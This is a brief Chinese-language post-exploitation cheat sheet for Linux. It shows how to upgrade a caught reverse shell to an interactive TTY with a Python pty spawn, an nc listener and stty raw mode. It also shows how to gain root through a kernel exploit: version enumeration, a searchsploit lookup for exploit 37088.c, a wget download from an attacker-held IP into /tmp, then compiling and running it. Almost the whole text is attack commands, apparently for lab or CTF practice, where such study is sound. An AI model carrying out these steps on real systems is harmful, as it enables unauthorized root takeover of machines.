获取完整交互式SHELL
su root su:必须从终端中执行
python伪终端
终端有些时候系统的命令终端不允许直接访问,可以使用python虚拟化一个终端来执行
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
Linux反弹shell解决乱码
bash #从zsh切换到bash
nc -lvp 6666
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z #将伪终端放置后台任务
stty -echo raw #设置原始格式
fg %1 #再调用后台任务(输入时无显示)
reset #初始化
Linux内核漏洞提权
利用堆栈溢出漏洞,根据当前系统寻找对应的漏洞的exp,使用exp对其进行提权。
uname -a #查看内核/操作系统/cpu信息
uname -v
cat /proc/version #内核信息
cat /etc/issue #发行信息
cat /etc/redhat-release #发行信息
lsb_release -a #显示发行版本信息
Linux version 3.19.0-15-generic
Ubuntu 15.04 Release
根据linux的内核版本查找对应的exp
searchsploit -t Ubuntu 15.04 #只利用标题搜索
searchsploit -s Ubuntu 15.04 #执行严格搜索,禁止对版本范围进行模糊搜索
searchsploit -s Linux Kernel 3.19.0
searchsploit -x linux/local/37088.c #检查或打开漏洞
searchsploit -m linux/local/37088.c #将一个漏洞复制到当前的工作目录
wget http://192.168.10.128/37088.c -O /tmp/37088.c
gcc 37088.c -o exp
chmod +x exp
./exp